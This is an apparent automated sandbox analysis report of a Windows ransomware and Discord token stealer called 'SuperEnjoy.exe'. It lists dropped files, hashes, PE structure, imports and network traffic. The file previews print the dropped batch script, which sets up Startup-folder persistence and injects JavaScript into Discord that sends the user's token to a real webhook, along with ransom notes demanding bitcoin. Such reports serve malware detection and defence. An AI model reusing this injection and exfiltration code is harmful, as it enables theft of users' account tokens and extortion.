                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: @shift /0..@echo off..setlocal enabledelayedexpansion..attrib %0 +r +s +h..copy /b /y %0 "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"..copy /b /y "%appdata%\Discord\0.0.309\modules\discord_voice\index.js" "%appdata%\Discord\indexvoicebackup.js"..set str=var X = window.localStorage = document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage;var V = JSON.stringify(X);var L = V;var C = JSON.parse(L);var strtoken = C["token"];var O = new XMLHttpRequest();O.open('POST', 'https://discord.com/api/webhooks/803443573722710047/DHTqigSoy72GqbbicAGvijeiMetfkvr8QL0UVyVIbp-4tehVd6_cnFln19Z4Ro5R76Ci', false);O.setRequestHeader('Content-Type', 'application/json');O.send('{"content": ' + strtoken + '}');..echo %str% >> "%appdata%\Discord\0.0.309\modules\discord_voice\index.js" .."%b2eincfilepath%\DiscordSendWebhook" -m ":writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended" -w https://discord.com/api/webhooks/807
                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\EEFC.tmp\aescrypt.exe
                                                                                                                                                                    Process:C:\Users\user\Desktop\SuperEnjoy.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):144384
                                                                                                                                                                    Entropy (8bit):6.805779966193588
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:NgzEhDpHGk/gqrYxgHNEt3koN0Shi76u7:NiEhNHgqrLme+i
                                                                                                                                                                    MD5:82FF688AA9253B356E5D890FF311B59E
                                                                                                                                                                    SHA1:4A143FC08B6A55866403966918026509BEFCC7C1
                                                                                                                                                                    SHA-256:B68FC901D758BA9EA3A5A616ABD34D1662197AA31B502F27CBF2579A947E53E9
                                                                                                                                                                    SHA-512:CBB3D81E3237B856E158C5F38F84230A50F913BDADA0EF37B679E27E7DDF3C970173B68D2415DD8A7377BA543206BB8E0FE77C61334B47C5684E3DDFFF86ACED
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Metadefender, Detection: 21%, Browse
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............d..d..d.A...d.A...d.A..7.d.....d..e...d.....d.A...d.A...d.A...d.Rich..d.........................PE..L...P.1U.................$...................@....@.................................N.....@..................................p..<...............................p...pA...............................k..@............@..0............................text...J#.......$.................. ..`.rdata...7...@...8...(..............@..@.data... g...........`..............@....rsrc................p..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    C:\Users\user\cryptormsg.hta
                                                                                                                                                                    Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                    File Type:HTML document, UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):594
                                                                                                                                                                    Entropy (8bit):5.203836804612856
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:kxg2n0wlL5T4uOs99FoWhWDHa60Gs/nGKmChAV4ryOqdERIMKD73CA:kO20W1TdOspokoanGs/ZmcAKQdE+n7d
                                                                                                                                                                    MD5:66C3C36BCE56B91A2AFCE91CDE7F0183
                                                                                                                                                                    SHA1:1792114A667D87F3FE7F3292090CD38664B14F59
                                                                                                                                                                    SHA-256:2806C4460894491C6D79D3CC0699B43AB1050B3DDC107845589D9BB017DF61C3
                                                                                                                                                                    SHA-512:3F561E83141793F684E8279772BC3DE69C8336833C2CDE03E0F6019D6532FCC77141AF8A2B290F9EFAFFED466B22879555107BC87B0938AA6857099A7F3F5155
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <html><head><title>Your files has been encrypted</title> .. ..<hta:application id="oBVC" ..applicationname="Cryptor" ..version="1.0" ..maximizebutton="no" ..minimizebutton="no" ..sysmenu="no" ..Caption="no" ..windowstate="maximize"/> .. ..</head><body bgcolor="red" scroll="no"> ..<font face="Lucida Console" size="4" color="#FFFFFF"> ..<p>Ooops Your files has been encrypted.</p> .. .. ..<p>.What can i do?</p> .. ..<p>Pay 0.0002 BTC to 5IpSW2U5mEVIu5q473DwAEJb0PR8B2Z.</p> .. ..<p>If you don't want pay there's no problem <b>your files will be DESTROYED</b></p> ..</font> ..</body></html> ..
                                                                                                                                                                    C:\Windows\System32\config\systemprofile\cryptormsg.hta
                                                                                                                                                                    Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                    File Type:HTML document, UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):611
                                                                                                                                                                    Entropy (8bit):5.227944252993781
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:kxg2n0wlL5T4uOs99FoWhWDHa60Gs/nGKmChAV46X0zjMERIMKD73CA:kO20W1TdOspokoanGs/ZmcAB0zwE+n7d
                                                                                                                                                                    MD5:6456B3311D25F98D30AC651FB704351D
                                                                                                                                                                    SHA1:5D819D88B4D8C16D48F3736AC1DD9F9C72F881B1
                                                                                                                                                                    SHA-256:C643EEFAC556E902A856634487CB53A45767A34603B816DE045B38C5D771E3B4
                                                                                                                                                                    SHA-512:7F1E9BDE4337B02EE0DFD4629D610D7849421C2C62465A2433B68FD654EFE718A7D2B17CB781DADC8A14D111997FEB2C8F6EE0418A3B89A9E27E61F581C82076
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Preview: <html><head><title>Your files has been encrypted</title> .. ..<hta:application id="oBVC" ..applicationname="Cryptor" ..version="1.0" ..maximizebutton="no" ..minimizebutton="no" ..sysmenu="no" ..Caption="no" ..windowstate="maximize"/> .. ..</head><body bgcolor="red" scroll="no"> ..<font face="Lucida Console" size="4" color="#FFFFFF"> ..<p>Ooops Your files has been encrypted.</p> .. .. ..<p>.What can i do?</p> .. ..<p>Pay 0.0002 BTC to TPRygqjVwBhEvr17RysRCgTBYJMrfnzpeHgLZ9cljfJrE79w.</p> .. ..<p>If you don't want pay there's no problem <b>your files will be DESTROYED</b></p> ..</font> ..</body></html> ..
                                                                                                                                                                    C:\Windows\Temp\1810.tmp\1811.tmp\1812.bat
                                                                                                                                                                    Process:C:\Users\user\Desktop\SuperEnjoy.exe
                                                                                                                                                                    File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):3575
                                                                                                                                                                    Entropy (8bit):5.610650035617315
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:O/3QpKgM3aNyYk1Jwr614K3f7k/M6V6E6o6B6n6Z6j6HX6I6V6z63i6j6V6V669Q:aApJHgwukaMwM08Ka7V0d
                                                                                                                                                                    MD5:E835405A7C500A96B4F760046CA1A843
                                                                                                                                                                    SHA1:F93ACE7FE24AFFA02A096661B4BF434DE3DE3C44
                                                                                                                                                                    SHA-256:B440531E313D5DF2EDC40CA7F98A2B4897B30069B50E66C3208D47118138610D
                                                                                                                                                                    SHA-512:A416923867DFDD06FBBA090EB1DE3B3EC244381F37F7C020694B09FD2D80B960DE57342FCA877602C6D6098718ADD3608820E60DCCA43D427449398543C76502
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: @shift /0..@echo off..setlocal enabledelayedexpansion..attrib %0 +r +s +h..copy /b /y %0 "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"..copy /b /y "%appdata%\Discord\0.0.309\modules\discord_voice\index.js" "%appdata%\Discord\indexvoicebackup.js"..set str=var X = window.localStorage = document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage;var V = JSON.stringify(X);var L = V;var C = JSON.parse(L);var strtoken = C["token"];var O = new XMLHttpRequest();O.open('POST', 'https://discord.com/api/webhooks/803443573722710047/DHTqigSoy72GqbbicAGvijeiMetfkvr8QL0UVyVIbp-4tehVd6_cnFln19Z4Ro5R76Ci', false);O.setRequestHeader('Content-Type', 'application/json');O.send('{"content": ' + strtoken + '}');..echo %str% >> "%appdata%\Discord\0.0.309\modules\discord_voice\index.js" .."%b2eincfilepath%\DiscordSendWebhook" -m ":writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended" -w https://discord.com/api/webhooks/807
                                                                                                                                                                    C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exe
                                                                                                                                                                    Process:C:\Users\user\Desktop\SuperEnjoy.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):988672
                                                                                                                                                                    Entropy (8bit):6.870063375918261
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:WAHnh+eWsN3skA4RV1Hom2KXMmHaWbK76Zu5:xh+ZkldoPK8YaWG+6
                                                                                                                                                                    MD5:FB7A78F485EC2586C54D60D293DD5352
                                                                                                                                                                    SHA1:D4E1F1061F7A872F9843E44C7D27D13BA7EF71BB
                                                                                                                                                                    SHA-256:B116FF00546620A598119D6704E9849393D2F9948FC8888D6DDF6211AA5B80B9
                                                                                                                                                                    SHA-512:B6635E849AB96740E5CEFEF3A874DC58CC26AA18CCC9CCA31E61E541C2DDEADE7EB59E524FC36DF22E0656884733F29D1143FFBF1CDD92FBD636D134D723C3E5
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Metadefender, Detection: 8%, Browse
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                    • Filename: InfoSender.exe, Detection: malicious, Browse
                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L....}._.........."..........2....................@..........................p............@...@.......@.........................|.......,n......................4q...+..............................PK..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...,n.......p...4..............@..@.reloc..4q.......r..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                    C:\Windows\Temp\1810.tmp\aescrypt.exe
                                                                                                                                                                    Process:C:\Users\user\Desktop\SuperEnjoy.exe
                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):144384
                                                                                                                                                                    Entropy (8bit):6.805779966193588
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:NgzEhDpHGk/gqrYxgHNEt3koN0Shi76u7:NiEhNHgqrLme+i
                                                                                                                                                                    MD5:82FF688AA9253B356E5D890FF311B59E
                                                                                                                                                                    SHA1:4A143FC08B6A55866403966918026509BEFCC7C1
                                                                                                                                                                    SHA-256:B68FC901D758BA9EA3A5A616ABD34D1662197AA31B502F27CBF2579A947E53E9
                                                                                                                                                                    SHA-512:CBB3D81E3237B856E158C5F38F84230A50F913BDADA0EF37B679E27E7DDF3C970173B68D2415DD8A7377BA543206BB8E0FE77C61334B47C5684E3DDFFF86ACED
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Metadefender, Detection: 21%, Browse
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............d..d..d.A...d.A...d.A..7.d.....d..e...d.....d.A...d.A...d.A...d.Rich..d.........................PE..L...P.1U.................$...................@....@.................................N.....@..................................p..<...............................p...pA...............................k..@............@..0............................text...J#.......$.................. ..`.rdata...7...@...8...(..............@..@.data... g...........`..............@....rsrc................p..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    \Device\ConDrv
                                                                                                                                                                    Process:C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):148
                                                                                                                                                                    Entropy (8bit):4.554134069706592
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:wsAlFp6LBMP4+fkHMBJXXe2A1VRM2I/F1rWAyqk5XB+LBFjAFoLB1:jaULB0fkgZXen1VqH/F1Dyqk5XSzr
                                                                                                                                                                    MD5:C42CFB58A85205A662EE6B313D327DC8
                                                                                                                                                                    SHA1:DEBAC2BD7400897C1C89F410697DDC5B8F29688D
                                                                                                                                                                    SHA-256:24454736FA668455A25BE0FA007095E1ADFE229F0865E2785658D7AF0FE25C22
                                                                                                                                                                    SHA-512:32BAB2BD46A4CB3215C104841F04E1677F674F7F96F1DE772CA03820909582CB4836A3E55557DC52C9AA31D265F892CAB4B7C9BD65F9CC52890D1D86B8809091
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: [OK] Message sent to WH ending with hE4K [:writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended]..

                                                                                                                                                                    Static File Info

                                                                                                                                                                    General

                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Entropy (8bit):7.413574759234585
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                    • VXD Driver (31/22) 0.00%
                                                                                                                                                                    File name:SuperEnjoy.exe
                                                                                                                                                                    File size:1051648
                                                                                                                                                                    MD5:b6ccb153be2baeb540e487cf5d52ee0b
                                                                                                                                                                    SHA1:609f491429520427dd4b8034ea0f313481e19b43
                                                                                                                                                                    SHA256:12db6f77d235f0af6461a490040f23e1dc902385de317cd19b5478df425f2ec0
                                                                                                                                                                    SHA512:d2fce8e5e0dc3bdb8efa4b46d8adb51701114da5eafdf9d34112af6fb3c6da6afaee30bcfd1408be48c322e744d8479f44297fdacb0f1b158bdfd6725c8e209f
                                                                                                                                                                    SSDEEP:24576:KTTsFdCYHmXIz2MYLjtAuiy6vNr7r688ZQ:cTuHPz2MYYyu1SQ
                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....usZ...............2..................... ....@..........................@.............................................

                                                                                                                                                                    File Icon

                                                                                                                                                                    Icon Hash:18f8829aacb90824

                                                                                                                                                                    Static PE Info

                                                                                                                                                                    General

                                                                                                                                                                    Entrypoint:0x401000
                                                                                                                                                                    Entrypoint Section:.code
                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                                    DLL Characteristics:
                                                                                                                                                                    Time Stamp:0x5A7375F8 [Thu Feb 1 20:18:00 2018 UTC]
                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                    File Version Major:4
                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                    Import Hash:5877688b4859ffd051f6be3b8e0cd533

                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                    Instruction
                                                                                                                                                                    push 000000ACh
                                                                                                                                                                    push 00000000h
                                                                                                                                                                    push 00417008h
                                                                                                                                                                    call 00007F20BC759491h
                                                                                                                                                                    add esp, 0Ch
                                                                                                                                                                    push 00000000h
                                                                                                                                                                    call 00007F20BC75948Ah
                                                                                                                                                                    mov dword ptr [0041700Ch], eax
                                                                                                                                                                    push 00000000h
                                                                                                                                                                    push 00001000h
                                                                                                                                                                    push 00000000h
                                                                                                                                                                    call 00007F20BC759477h
                                                                                                                                                                    mov dword ptr [00417008h], eax
                                                                                                                                                                    call 00007F20BC7593F1h
                                                                                                                                                                    mov eax, 00416084h
                                                                                                                                                                    mov dword ptr [0041702Ch], eax
                                                                                                                                                                    call 00007F20BC7621B2h
                                                                                                                                                                    call 00007F20BC761F1Eh
                                                                                                                                                                    call 00007F20BC75EE18h
                                                                                                                                                                    call 00007F20BC75E69Ch
                                                                                                                                                                    call 00007F20BC75E12Fh
                                                                                                                                                                    call 00007F20BC75DEA9h
                                                                                                                                                                    call 00007F20BC75D9CDh
                                                                                                                                                                    call 00007F20BC75D14Dh
                                                                                                                                                                    call 00007F20BC759775h
                                                                                                                                                                    call 00007F20BC760A98h
                                                                                                                                                                    call 00007F20BC75F540h
                                                                                                                                                                    mov edx, 0041602Ah
                                                                                                                                                                    lea ecx, dword ptr [00417014h]
                                                                                                                                                                    call 00007F20BC759408h
                                                                                                                                                                    push FFFFFFF5h
                                                                                                                                                                    call 00007F20BC759418h
                                                                                                                                                                    mov dword ptr [00417034h], eax
                                                                                                                                                                    mov eax, 00000200h
                                                                                                                                                                    push eax
                                                                                                                                                                    lea eax, dword ptr [004170B0h]
                                                                                                                                                                    push eax
                                                                                                                                                                    xor eax, eax
                                                                                                                                                                    push eax
                                                                                                                                                                    push 00000015h
                                                                                                                                                                    push 00000004h
                                                                                                                                                                    call 00007F20BC75E0F2h
                                                                                                                                                                    push dword ptr [00417098h]

                                                                                                                                                                    Data Directories

                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x161740xc8.data
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x180000xeba00.rsrc
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x164680x22c.data
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                    Sections

                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                    .code0x10000x37f00x3800False0.472307477679data5.61235572875IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .text0x50000xcfa20xd000False0.513502854567data6.58582031604IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .rdata0x120000x33a00x3400False0.804612379808data7.1102355063IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .data0x160000x17240x1200False0.390842013889data4.93808065786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .rsrc0x180000xeba000xeba00False0.738384864058data7.42342121979IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                    Resources

                                                                                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                                                                                    RT_ICON0x185ec0x468GLS_BINARY_LSB_FIRST
                                                                                                                                                                    RT_ICON0x18a540x988data
                                                                                                                                                                    RT_ICON0x193dc0x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4278190080, next used block 4278190080
                                                                                                                                                                    RT_ICON0x1a4840x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4278190080, next used block 4278190080
                                                                                                                                                                    RT_ICON0x1ca2c0x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4278190080, next used block 4278190080
                                                                                                                                                                    RT_ICON0x20c540x94a8data
                                                                                                                                                                    RT_ICON0x2a0fc0x10828data
                                                                                                                                                                    RT_ICON0x3a9240x25228dBase IV DBT of \200\001.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4278190080, next used block 4278190080
                                                                                                                                                                    RT_ICON0x5fb4c0x32b7PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    RT_RCDATA0x62e040x1very short file (no magic)
                                                                                                                                                                    RT_RCDATA0x62e080x14zlib compressed data
                                                                                                                                                                    RT_RCDATA0x62e1c0xdefdata
                                                                                                                                                                    RT_RCDATA0x63c0c0x74data
                                                                                                                                                                    RT_RCDATA0x63c800xddata
                                                                                                                                                                    RT_RCDATA0x63c900x8afefdata
                                                                                                                                                                    RT_RCDATA0xeec800x14774data
                                                                                                                                                                    RT_GROUP_ICON0x1033f40x84data
                                                                                                                                                                    RT_VERSION0x1034780x2e8data
                                                                                                                                                                    RT_MANIFEST0x1037600x2a0XML 1.0 document, ASCII text, with very long lines, with no line terminators

                                                                                                                                                                    Imports

                                                                                                                                                                    DLLImport
                                                                                                                                                                    MSVCRT.dllmemset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, _wcsicmp, wcslen, wcscpy, wcscmp, memcpy, tolower, wcscat, malloc
                                                                                                                                                                    KERNEL32.dllGetModuleHandleW, HeapCreate, GetStdHandle, HeapDestroy, ExitProcess, WriteFile, GetTempFileNameW, LoadLibraryExW, EnumResourceTypesW, FreeLibrary, RemoveDirectoryW, GetExitCodeProcess, EnumResourceNamesW, GetCommandLineW, LoadResource, SizeofResource, FreeResource, FindResourceW, GetNativeSystemInfo, GetShortPathNameW, GetWindowsDirectoryW, GetSystemDirectoryW, EnterCriticalSection, CloseHandle, LeaveCriticalSection, InitializeCriticalSection, WaitForSingleObject, TerminateThread, CreateThread, Sleep, GetProcAddress, GetVersionExW, WideCharToMultiByte, HeapAlloc, HeapFree, LoadLibraryW, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, GetEnvironmentVariableW, SetEnvironmentVariableW, GetCurrentProcess, TerminateProcess, SetUnhandledExceptionFilter, HeapSize, MultiByteToWideChar, CreateDirectoryW, SetFileAttributesW, GetTempPathW, DeleteFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, CreateFileW, SetFilePointer, TlsFree, TlsGetValue, TlsSetValue, TlsAlloc, HeapReAlloc, DeleteCriticalSection, InterlockedCompareExchange, InterlockedExchange, GetLastError, SetLastError, UnregisterWait, GetCurrentThread, DuplicateHandle, RegisterWaitForSingleObject
                                                                                                                                                                    USER32.DLLCharUpperW, CharLowerW, MessageBoxW, DefWindowProcW, DestroyWindow, GetWindowLongW, GetWindowTextLengthW, GetWindowTextW, UnregisterClassW, LoadIconW, LoadCursorW, RegisterClassExW, IsWindowEnabled, EnableWindow, GetSystemMetrics, CreateWindowExW, SetWindowLongW, SendMessageW, SetFocus, CreateAcceleratorTableW, SetForegroundWindow, BringWindowToTop, GetMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, DestroyAcceleratorTable, PostMessageW, GetForegroundWindow, GetWindowThreadProcessId, IsWindowVisible, EnumWindows, SetWindowPos
                                                                                                                                                                    GDI32.DLLGetStockObject
                                                                                                                                                                    COMCTL32.DLLInitCommonControlsEx
                                                                                                                                                                    SHELL32.DLLShellExecuteExW, SHGetFolderLocation, SHGetPathFromIDListW
                                                                                                                                                                    WINMM.DLLtimeBeginPeriod
                                                                                                                                                                    OLE32.DLLCoInitialize, CoTaskMemFree
                                                                                                                                                                    SHLWAPI.DLLPathAddBackslashW, PathRenameExtensionW, PathQuoteSpacesW, PathRemoveArgsW, PathRemoveBackslashW

                                                                                                                                                                    Version Infos

                                                                                                                                                                    DescriptionData
                                                                                                                                                                    InternalNameBatFilecoder
                                                                                                                                                                    FileVersion1.0
                                                                                                                                                                    CompanyNameOpenMe
                                                                                                                                                                    LegalTrademarksOpenMe Reserved
                                                                                                                                                                    CommentsDont Read
                                                                                                                                                                    ProductNameHowToMake
                                                                                                                                                                    ProductVersion1.0
                                                                                                                                                                    FileDescriptionHell open me plaese
                                                                                                                                                                    OriginalFilenameNewRealisticSoftware
                                                                                                                                                                    Translation0x0000 0x04e4

                                                                                                                                                                    Network Behavior

                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                    TCP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Feb 6, 2021 21:36:04.509918928 CET49727443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:04.552807093 CET44349727162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:04.552921057 CET49727443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:04.559391975 CET49727443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:04.602180958 CET44349727162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:04.602961063 CET44349727162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:04.603044033 CET44349727162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:04.603120089 CET49727443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:04.609678030 CET49727443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:04.653069973 CET44349727162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:04.653215885 CET44349727162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:04.695745945 CET49727443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:04.717168093 CET49727443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:04.717237949 CET49727443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:04.760107040 CET44349727162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:04.760159016 CET44349727162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:04.970401049 CET44349727162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:04.970443010 CET44349727162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:04.970478058 CET44349727162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:04.970514059 CET44349727162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:04.970515966 CET49727443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:04.970571995 CET49727443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:06.365693092 CET49727443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:12.171406031 CET49729443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:12.216273069 CET44349729162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:12.216412067 CET49729443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:12.221110106 CET49729443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:12.265944958 CET44349729162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:12.266758919 CET44349729162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:12.266810894 CET44349729162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:12.266993046 CET49729443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:12.270473003 CET49729443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:12.315249920 CET44349729162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:12.315347910 CET44349729162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:12.356144905 CET49729443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:12.383200884 CET49729443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:12.383244991 CET49729443192.168.2.3162.159.128.233
                                                                                                                                                                    Feb 6, 2021 21:36:12.426409006 CET44349729162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:12.426450014 CET44349729162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:12.665915966 CET44349729162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:12.665965080 CET44349729162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:12.665996075 CET44349729162.159.128.233192.168.2.3
                                                                                                                                                                    Feb 6, 2021 21:36:12.666078091 CET49729443192.168.2.3162.159.128.233
